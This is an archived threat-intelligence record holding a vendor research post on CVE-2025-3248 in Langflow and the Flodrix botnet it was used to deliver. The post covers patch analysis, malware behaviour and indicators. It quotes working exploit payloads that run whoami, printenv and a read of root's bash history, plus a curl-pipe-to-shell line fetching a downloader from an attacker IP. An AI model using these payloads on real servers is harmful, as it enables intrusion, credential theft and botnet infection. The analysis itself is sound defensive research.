{
	"id": "b8161c6d-fe9c-4900-8098-d6de87cd3df1",
	"created_at": "2026-04-06T00:16:54.751125Z",
	"updated_at": "2026-04-10T13:11:54.540462Z",
	"deleted_at": null,
	"sha1_hash": "1871e42352d139b9e16365595cc2558be67ab6a5",
	"title": "Critical Langflow Vulnerability (CVE-2025-3248) Actively Exploited to Deliver Flodrix Botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3754985,
	"plain_text": "Critical Langflow Vulnerability (CVE-2025-3248) Actively\r\nExploited to Deliver Flodrix Botnet\r\nPublished: 2025-06-17 · Archived: 2026-04-05 18:41:01 UTC\r\nSummary:\r\nTrend™ Research has identified an active campaign exploiting CVE-2025-3248 to deliver the Flodrix\r\nbotnet. Attackers use the vulnerability to execute downloader scripts on compromised Langflow servers,\r\nwhich in turn fetch and install the Flodrix malware.\r\nCVE-2025-3248 (CVSS 9.8) is a critical vulnerability in Langflow versions before 1.3.0. Organizations\r\nusing Langflow versions prior to 1.3.0 on public networks are at critical risk, as this vulnerability is being\r\nactively exploited in the wild. Langflow's broad adoption in prototyping and deploying intelligent\r\nautomation makes vulnerable deployments attractive targets.\r\nIf the vulnerability is successfully exploited, threat actors behind the Flodrix botnet can cause full system\r\ncompromise, DDoS attacks, and potential loss or exposure of sensitive information hosted on affected\r\nLangflow servers. \r\nOrganizations running Langflow should immediately patch and upgrade to version 1.3.0 or later, restrict\r\npublic access to Langflow endpoints, and monitor for indicators of compromise associated with the Flodrix\r\nbotnet.\r\nTrend Micro customers are protected from exploitation attempts via available Trend Vision One™ Network\r\nSecurity rules and filters. Trend Vision One customers can also access hunting queries, threat insights, and\r\nthreat intelligence reports to gain rich context and the latest updates on this attack. These protection details\r\ncan be found at the end of this article. \r\nThis blog details research and analysis of an active campaign that exploits a critical unauthenticated remote code\r\nexecution (RCE) vulnerability, CVE-2025-3248, that has been identified in Langflow versions prior to 1.3.0. \r\nLangflow is a Python-powered visual framework for building AI applications with over 70,000 GitHub stars, and\r\nits versions prior to 1.3.0 contains a flaw in its code validation mechanism that permits arbitrary code execution.\r\nUnauthenticated attackers can exploit this vulnerability by crafting malicious POST requests to the\r\n/api/v1/validate/code endpoint. \r\nThe malicious payload in our investigation was found embedded within argument defaults or decorators of a\r\nPython function definition. Since Langflow does not enforce input validation or sandboxing, these payloads are\r\ncompiled and executed within the server's context, leading to RCE.\r\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerabilitynews article to its\r\nKnown Exploited Vulnerabilities (KEV) catalog on May 5, 2025. Table 1 summarizes the details of the\r\nvulnerability that we discuss further in this blog.\r\nCVE Identifier CVE-2025-3248\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 1 of 25\n\nCVSS Score CVSS Score: 9.8 (Critical)\r\nVector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\r\nAffected Versions Langflow versions before 1.3.0\r\nVulnerability Type Missing authentication, Code Injection\r\nImpact Allows remote unauthenticated attackers to execute arbitrary code\r\nTable 1. CVE-2025-3248 vulnerability details\r\nTechnical analysis of the CVE-2025-3248 exploit\r\nBased on our investigation and the command execution timeline, cybercriminals initiated the attack by first\r\ngathering a list of IP addresses and ports of publicly exposed Langflow servers, potentially using tools like Shodan\r\nor FOFA.\r\nThe attacker uses an open-source code proof of concept (PoC) from https://github.com/verylazytech/CVE-2025-\r\n3248 to obtain remote shell access on the vulnerable systems. The attacker then runs various reconnaissance bash\r\ncommands on the infected system and sends the results back to the command-and-control (C\u0026C) server.\r\nThe attacker then downloads and executes the Flodrix Botnet on the infected system. Once the malware is\r\nsuccessfully installed and establishes a connection with the command and control (C\u0026C) server, it can receive\r\ncommands over TCP to launch various distributed denial-of-service (DDoS) attacks. The payload will terminate\r\nand delete itself unless a valid parameter is provided.\r\nBased on these steps, the attacker is likely profiling all vulnerable servers and uses the collected data to identify\r\nhigh-value targets for future infections. During the investigation, we observed that the trojan downloader script\r\nexecuted the final payload with an invalid argument. As a result, after initial execution and establishing a\r\nconnection, the malware terminated and deleted itself. This behavior is designed to determine which payload\r\nsuccessfully executes on the target system architecture and can initiate communication with the C\u0026C server.\r\nThe vulnerability resides specifically within the /api/v1/validate/code endpoint. This endpoint, designed to\r\nvalidate Python code snippets, fails to implement adequate authentication. It processes user-supplied code by first\r\nparsing it into an Abstract Syntax Tree (AST) using ast.parse(). Subsequently, it employs Python's compile()\r\nfunction to convert the AST into executable bytecode, which is then executed via exec();.\r\nMalicious payloads can be embedded within these syntactic structures. When Langflow's compile() function\r\nprocesses an AST node representing a function with such embedded payloads, the malicious code is executed in\r\nthe server's context. This occurs without any authentication, allowing remote attackers to submit crafted POST\r\nrequests to achieve RCE.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 2 of 25\n\nFigure 2. CVE-2025-3248 Remote Code Execution flow.\r\nThe following list details specific Python payloads in the exploitation attempts we investigated against Langflow's\r\nvulnerable endpoint. These payloads, embedded within function default arguments or decorators, demonstrate\r\nvarious reconnaissance and initial access techniques.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"whoami\\\", shell=True))')\r\nCommand executed: whoami\r\nDetails: Identifies the current user/effective user ID of the process running the Langflow application on the\r\ncompromised system. This is a common first step in reconnaissance to understand privileges.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"printenv\\\", shell=True))')\r\nCommand executed: printenv\r\nDetails: Dumps all environment variables. This can reveal sensitive information such as API keys, cloud\r\ncredentials, database connection strings, or other configuration details accessible to the Langflow process.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"cat /root/.bash_history\\\", shell=True))')\r\nCommand executed: cat /root/.bash_history\r\nDetails: Attempts to read the Bash history file of the root user. This could expose previously executed\r\ncommands, revealing insights into the system's administration, installed software, or potential\r\nmisconfigurations.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"ip addr show\\\", shell=True))')\r\nCommand executed: ip addr show\r\nDetails: Displays network interface information and IP addresses configured on the system. This is crucial\r\nfor network reconnaissance, helping attackers map the internal network and identify potential targets or\r\negress points.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 3 of 25\n\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"ifconfig\\\", shell=True))')\r\nCommand executed: ifconfig\r\nDetails: Similar to ip addr show, this provides details about network interfaces, including IP addresses,\r\nMAC addresses, and network statistics. Often used for basic network enumeration.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"systemctl status sshd\\\", shell=True))')\r\nCommand executed: systemctl status sshd\r\nDetails: Checks the status of the SSH daemon service. This command is used to determine if SSH is\r\nrunning, which could indicate a potential remote access vector for the attacker\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"capsh --print\\\", shell=True))')\r\nCommand executed: capsh --print\r\nDetails: Displays the current capabilities of the process. Understanding process capabilities (e.g.,\r\nCAP_NET_BIND_SERVICE, CAP_SYS_PTRACE) can help attackers identify further escalation paths or\r\nprivileged operations they can perform.\r\n` exec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"curl -s http://\u003cIP\u003e:\r\n\u003cPORT\u003e/dockersh\\\", shell=True))')\r\nCommand executed: curl -s http://80.66.75.121:25565/docker | sh\r\nDetails: This command downloads and execute a trojan downloader script named 'docker' from an attacker-controlled server.\r\nFigure 3. CVE-2025-3248 RCE traffic.\r\nWe observed that the attacker used an open-source code proof of concept (PoC) from\r\nhttps://github.com/verylazytech/CVE-2025-3248 to interact with the vulnerable systems to enable code execution\r\nand payload delivery as part of the attack. Figure 4 and 5 demonstrates the PoC usage.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 4 of 25\n\nFigure 4. Python proof of concept (PoC) snippet from GitHub PoC for CVE-2025-3248.\r\nFigure 5. CVE-2025-3248 PoC script execution.\r\nThe attacker then runs various reconnaissance bash commands on the infected system and sends the results back\r\nto the C\u0026C server.\r\nCVE-2025-3248 patch analysis \r\nA security update has been released for CVE-2025-3248 which is included in Langflow version 1.3.0. It resolves\r\nthe authentication vulnerability in the /api/v1/validate/code endpoint and implements an authentication\r\nrequirement by adding a new parameter, _current_user: CurrentActiveUser to the post_validate_code function.\r\nThis parameter acts as an authentication dependency, verifying the user's identity and session validity before\r\npermitting access.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 5 of 25\n\nFigure 6. Logs of the CVE-2025-3248 patch update.\r\nThe CurrentActiveUser dependency checks for an authenticated user session, triggering an exception if the user is\r\nnot authenticated. As a result, this update ensures that only authorized users can access the /api/v1/validate/code\r\nendpoint.\r\nThe authentication flow begins when a request is made to the /api/v1/validate/code endpoint. FastAPI parses the\r\nfunction signature and detects the _current_user: CurrentActiveUser dependency. It immediately pauses execution\r\nof post_validate_code.\r\nAuthentication is triggered when FastAPI invokes the underlying logic for CurrentActiveUser to satisfy the\r\ndependency. This logic's primary responsibility is to authenticate the user. It inspects the incoming request for\r\ncredentials, specifically looking for:\r\nA JWT Bearer token in the Authorization header.\r\nAn x-api-key provided in the request headers or as a query parameter.\r\nCredentials are then validated, with two possible scenarios:\r\nFailure. If neither credential type is found, or if the provided token/key is invalid, the dependency raises an\r\nHTTPException. The request is immediately rejected with a 401 Unauthorized or 403 Forbidden error, and\r\nthe endpoint's code is never reached.\r\nSuccess. If the credentials are valid, the dependency retrieves the corresponding user from the database.\r\nIn the case of a successful credential validation, the retrieved user object is then checked to ensure its is_active\r\nflag is true. If the user is inactive, the process is halted with another HTTPException. \r\nExecution is granted only if the user is successfully authenticated and active does the dependency logic complete.\r\nFastAPI considers the dependency \"satisfied\" and finally proceeds to execute the code within the\r\npost_validate_code function.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 6 of 25\n\nFigure 7. Langflow source code update.\r\nAttack chain analysis\r\nName docker\r\nMD5 eaf854b9d232566e82a805e9be8b2bf2\r\nSHA-1 e367cee9e02690509b4acdf7060f1a4387d85ec7\r\nSHA-256 ec0f2960164cdcf265ed78e66476459337c03acb469b6b302e1e8ae01c35d7ec\r\nSize 700 bytes\r\nFile Type Bash Script\r\nTable 2. Bash script downloader details\r\nUpon successfully exploiting CVE-2025-3248, the threat actor deploys a bash shell script named \"docker\". This\r\nscript is designed to download and execute ELF binaries of Flodrix botnet targeting multiple system architectures.\r\nIt attempts to run the script /tmp/e1x with the argument _docker and then checks the output for the string\r\n“Upgrading Kernel..”. If this string is present, the condition passes, and the script deletes the downloaded file. If\r\nnot, those commands are skipped.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 7 of 25\n\nFigure 8. Bash script downloader code.\r\nDuring our investigation, we identified that the threat actor is hosting different downloader scripts on the same\r\nhost 80[.]66[.]75[.]121 that serve the same purpose. This indicates that an active development is going on and\r\nmultiple campaigns is active. \r\nName deez\r\nMD5 176f293dd15b9cf87ff1b8ba70d98bcf\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 8 of 25\n\nSHA-1 7823b91efceedaf0e81856c735f13ae45b494909\r\nSHA-256 64927195d388bf6a1042c4d689bcb2c218320e2fa93a2dcc065571ade3bb3bd3\r\nSize 5202 bytes\r\nFile Type Bash Script\r\nTable 3. Downloader variant details.\r\nThe script begins by terminating specific processes named \"busybox,\" \"systemd,\" and \"watchdog\" if their process\r\nIDs (PIDs) are greater than 500. This condition likely aims to avoid early started critical system processes,\r\nensuring the script targets dynamically created or user-related processes that could interfere with its operations,\r\nsuch as security utilities. \r\nIt then sets up variables, including the server IP and ports for HTTP, TFTP, and FTP, specifying several file names\r\ncorresponding to various system architectures. The script changes the working directory to /tmp, removes any pre-existing files that match the e1x.* pattern, and defines several utility functions. These functions check the\r\nexistence of commands like wget, curl, and tftp, verify if they execute without being killed, and determine the best\r\nmethod available for downloading files.\r\nThe core functionality involves the download_with_fallback function, which attempts to download files using\r\nvarious defined methods. If the primary method fails, it falls back to using secondary methods like busybox\r\nversions of wget or curl, and as a last resort, tftp or ftpget. \r\nOnce a file is downloaded, it tries to execute the file using the execute_file function, which changes file\r\npermissions to make it executable and checks for certain output messages to determine the success or failure of the\r\nexecution. The script processes each file in sequence, attempting to download and execute until a successful\r\nexecution is achieved.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 9 of 25\n\nFigure 9. Downloader variant.\r\nFlodrix botnet payload analysis\r\nName e1x.x86_64\r\nMD5 82d8bc51a89118e599189b759572459f\r\nSHA-1 d703ec4c4d11c7a7fc2fcf4a4b8776862a3000b5\r\nSHA-256 912573354e6ed5d744f490847b66cb63654d037ef595c147fc5a4369fef3bfee\r\nSize 86032 bytes\r\nFile Type ELF\r\nTable 4. Flodrix botnet details\r\nOur analysis indicates that the downloaded payload is an evolving variant of the LeetHozer malware family. This\r\nvariant employs multiple stealth techniques, including self-deletion and artifact removal, to minimize forensic\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 10 of 25\n\ntraces and hinder detection. It also uses string obfuscation to conceal command-and-control (C\u0026C) server\r\naddresses and other critical indicators, complicating analysis efforts. \r\nNotably, this version supports dual communication channels with its C\u0026C infrastructure over both TCP and UDP\r\nchannels. Once connected, it can receive commands over TCP to launch various distributed denial-of-service\r\n(DDoS) attacks. \r\nAdditionally, we have found some similarities with LeetHozer botnet covered by netlab360 team md5:\r\n57212f7e253ecebd39ce5a8a6bd5d2df and we will demonstrate the similarities and difference during this research.\r\nUpon execution, the malware decrypts an obfuscated string using a XOR-based algorithm with the key\r\n“qE6MGAbI”, the same key used by LeetHozer botnet. This reveals the message “Upgrading Kernel..” which is\r\nimmediately written to standard output. This message acts as a signal indicating successful execution of the\r\nmalware binary to the malware's downloader script. \r\nNext, the malware retrieves its own process ID and allocates a clean memory buffer to handle any provided\r\ncommand-line arguments. If a single argument is present, it is copied into memory and promptly zeroed out. \r\nThe malware also performs self-deletion, erasing its own binary from disk by referencing its full execution path.\r\nThese behaviors are anti-forensic technique, designed to hinder post-infection analysis.\r\nFigure 11. Decrypting Upgrading Kernel string and the removal of the malware execution path\r\nFollowing this, the malware searches for a hidden file named “.system_idle”, with the filename being decrypted\r\nduring runtime. This file is used to store the malware's process ID (PID) and serves as a tracker to determine if the\r\nmalware has been previously executed. The presence of this file indicates a prior instance of execution. If found,\r\nthe malware reads the file line by line, where each line is expected to contain one or two comma-separated PIDs. \r\nFor every valid PID identified, the malware checks if the corresponding process is still running. If it is, the\r\nmalware forcibly terminates it using the SIGKILL signal. After completing this operation, the “.system_idle” file is\r\ndeleted. This routine not only prevents duplicate or conflicting instances of the malware from running but also\r\nprovides a self-termination or cleanup mechanism, allowing the malware to discreetly remove its own artifacts.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 11 of 25\n\nFigure 12. Store PID and PPID in the hidden file\r\nThe malware then attempts to fork child processes with randomly generated names and parameters. The malware\r\nalso performs anti-debugging technique by forking a new process and if the new process is not a child, it\r\nterminates the parent process which break debuggers. \r\nIf the malware successfully creates the child processes, it proceeds to write the process ID to the hidden file and\r\nperform its malicious activities. The malware decrypts embedded C\u0026C server addresses using the same XOR key\r\nand initialize the connection with the C\u0026C.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 12 of 25\n\nFigure 13. Decrypting C\u0026C IP addresses with hardcoded XOR Key\r\nThe malware supports two communication channels with its C\u0026C server: one over standard TCP and another over\r\nthe Tor network. By default, it establishes a socket connection with the C\u0026C server using the TCP channel.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 13 of 25\n\nFigure 14. Initialize a TCP socket with the C\u0026C.\r\nThe malware then tries to connect to one of the C\u0026C servers over port 54707. Once the malware successfully\r\nconnects to the C\u0026C server, it sends the first TCP request. \r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 14 of 25\n\nFigure 15. Construct and sending first request pseudocode.\r\nThe packet has a fixed length of 255 bytes and includes hardcoded magic bytes 0x3A20, 0xB042, and 0x0000.\r\nFigure 16 shows the structure of the packet. \r\nFigure 16. First request structure.\r\nThe checksum is computed by summing 12 consecutive 16-bit words, then folding the result into 16 bits by\r\nadding the high and low halves. The final checksum is the lower 16 bits of this folded value. \r\nUpon receiving a response from the C\u0026C server, the malware analyzes the first 32 bytes of the 255-byte reply\r\npacket. It begins by checking whether the first four bytes (the response header) are equal to 0xFF0103FF. If this\r\ncondition is met, the malware terminates its execution and closes the socket connection. If not, it proceeds to\r\nverify the response by checking if bytes 4-7 equal 0x8931 or bytes 8-11 equal 0xB043. \r\nIf either condition is satisfied, the response is considered valid. The malware then modifies the received packet to\r\nconstruct the second request: it sets bytes 8-11 to 0x8932, updates the first two bytes to 0x3A20 instead of the\r\nsource port, and assigns a new request number 0x0002.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 15 of 25\n\nThen, the malware sends the second request. The malware checks if the C\u0026C replies with a valid response as in\r\nthe first response, this time by checking if bytes 4-7 equal 0x4EEB or bytes 8-11 equal 0x8932. If either condition\r\nis satisfied, the response is considered valid, and the bot is active and ready to receive commands from the C\u0026C.\r\nFigure 17. Malware requests and responses handling pseudocode.\r\nThe malware then begins sending periodic heartbeat requests, each consisting of a single byte with the value 0x00.\r\nIn response to the first heartbeat, the C\u0026C server typically replies with 0x01, instructing the bot to send the\r\noriginal parameter it was launched with. If the malware was executed without any parameters, it sends the string\r\n\"null\" by default.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 16 of 25\n\nFigure 18. Send parameter information to the C\u0026C\r\nThe malware can receive commands from its C\u0026C server to launch various DDoS attacks. Upon receiving a\r\nresponse packet from the C\u0026C, the malware parses it to extract critical attack parameters such as the attack type,\r\ntarget IP address, target port, and attack duration.\r\nFigure 19. Parse C\u0026C commands and extract attack details\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 17 of 25\n\nThese pieces of information are stored in a structured format. The number of structures is calculated by XORing\r\nthe first byte 0x3e with the fifth byte 0x3f. Once the count is determined, the malware proceeds to extract and\r\npopulate each structure accordingly. Each structure consists of structure header and structure value. Structure\r\nbegins with 0x0001 or 0x0002, which represent structure type.\r\nFigure 20. Anatomy of attack structures\r\nThe malware can receive different types of configurations from the C\u0026C. Table 3 shows found values and their\r\ncorresponding purpose.\r\nStructure types\r\n0x0001 Add 4 bytes of Zero Padding\r\n0x0002 No Zero bytes padding\r\nValue Types\r\n0x0004 Attack Type tcpraw, udpplain, handshake, tcplegit, ts3, udp\r\n0x0005 Attack Duration\r\n0x0006 Target IP\r\n0x000C Target Port\r\nTable 5. Structure and value types\r\nThe malware can perform various DDoS attacks based on the configuration received from the C\u0026C. The\r\nsupported DDoS attacks are tcpraw, udpplain, handshake, tcplegit, ts3, and udp.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 18 of 25\n\nFigure 21. DDoS attack types\r\nNotable changes in the Flodrix botnet\r\nWhile the Flodrix botnet sample we investigated showed similarities with the variant analyzed by netlab360 team\r\nmd5: 57212f7e253ecebd39ce5a8a6bd5d2df such as the string decryption mechanism, XOR key, and traffic\r\nstructure, it also presents distinct differences which we discuss in this section. \r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 19 of 25\n\nWe observed changes in the response headers as shown in Figure 22.\r\nFigure 22. A comparison between the magic headers of the malware versions.\r\nThe new variant also appears to support additional configuration options; however, due to limited access to the\r\nC\u0026C server, these configurations could not be fully identified.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 20 of 25\n\nFigure 23. A comparison between configurations of the malware versions.\r\nAnother significant change is the introduction of new DDoS attack types, which are now also encrypted, adding a\r\nfurther layer of obfuscation.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 21 of 25\n\nFigure 24. A comparison of attack types between a previous version of the malware.\r\nThe new sample also notably enumerates the running processes by opening /proc directory to access all running\r\nprocesses. It iterates through the directory entries to filter out valid process identifiers (PIDs) and fetches detailed\r\ninformation about them, such as command names, execution paths, and command-line arguments. \r\nThen, the malware compares the running process with specific process such as init, systemd, watchdog, busybox\r\nand /bin/busybox. Additionally, it checks if the process is running from /tmp directory. If a process matches the\r\nconditions, it sends signals to terminate it and sends a notification message starts with “KILLDETAIL|” to the\r\nC\u0026C over port 50445 over UDP with terminated process details.\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 22 of 25\n\nFigure 25. Process termination and notification\r\nFigure 26 illustrates the notification request with process details:\r\nFigure 26. UDP notification traffic\r\nThe following table shows the structure if the UDP notification traffic:\r\nKILLDETAIL|PID|PPID|SIGNAL|COMM|EXE|CWD|CMDLINE|SOCKET_COUNT\r\nKILLDETAIL Hardcoded value\r\nPID (Process ID) Get from PID from /proc directory\r\nPPID (Parent Process ID) Get from /proc/%d/stat file with %c %d options\r\nSignal (Action) Hardcoded values. Possible values (2,3,4,5,8,9)\r\nCOMM (Process Name) Get from /proc/%d/comm file\r\nEXE (Process Executable Path) Get from /proc/%d/exe file\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 23 of 25\n\nCWD (Current Working Directory) Get from /proc/%d/cwd file\r\nCMDLINE (Command Line) Get from /proc/%d/cmdline file\r\nNumber of sockets Get from /proc/%d/fd/%s file\r\nTable 6. UDP notification request anatomy\r\nProactive security with Trend Vision One™\r\nTrend Vision Oneone-platform™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber\r\nrisk exposure management, security operations, and robust layered protection. This comprehensive approach helps\r\nyou predict and prevent threats, accelerating proactive security outcomes across your entire digital estate.\r\nBacked by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity\r\nAI, it delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security\r\nleaders can benchmark their posture and showcase continuous improvement to stakeholders.\r\nTrend protections for CVE-2025-3248\r\nThe following protections have been available to Trend Micro customers:\r\nTrend Vision One™ Network Security\r\nTippingPoint Intrusion Prevention Filters:\r\n \r\n46063: TCP: Trojan.Linux.FlodrixBot.A Runtime Detection\r\n \r\n46064: UDP: Trojan.Linux.FlodrixBot.A Runtime Detection\r\n \r\n45744: HTTP: Langflow Code Injection Vulnerability\r\n \r\nDeep Discovery Inspector (DDI) Relevance Rule: 5411: CVE-2025-3248 - LANGFLOW RCE - HTTP\r\n(Request)\r\nTrend Micro™ Threat Intelligence\r\nTo stay ahead of evolving threats, Trend customers can access Threat Insights, which provides the latest insights\r\nfrom Trend Research on emerging threats and threat actors.  \r\nThreat Insights\r\nEmerging Threats: Critical Langflow Vulnerability [CVE-2025-3248] Actively Exploited to Deliver Flodrix\r\nBotnet\r\nHunting Queries\r\nTrend Vision One Search App \r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 24 of 25\n\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this\r\nblog post with data in their environment.    \r\nC\u0026C connections of Flodrix Botnet\r\neventSubId:602 AND objectIp:(80.66.75.121 OR 45.61.137.226 OR 206.71.149.179 OR 188.166.68.21)\r\nMore hunting queries are available for Vision One customers with Threat Insights entitlement enabledone-platform \r\nIndicators of Compromise (IOCs)\r\nYou can find the IoCs for this blog here.\r\nSource: https://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 25 of 25",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html"
	],
	"report_names": [
		"langflow-vulnerability-flodric-botnet.html"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434614,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1871e42352d139b9e16365595cc2558be67ab6a5.pdf",
		"text": "https://archive.orkl.eu/1871e42352d139b9e16365595cc2558be67ab6a5.txt",
		"img": "https://archive.orkl.eu/1871e42352d139b9e16365595cc2558be67ab6a5.jpg"
	}
}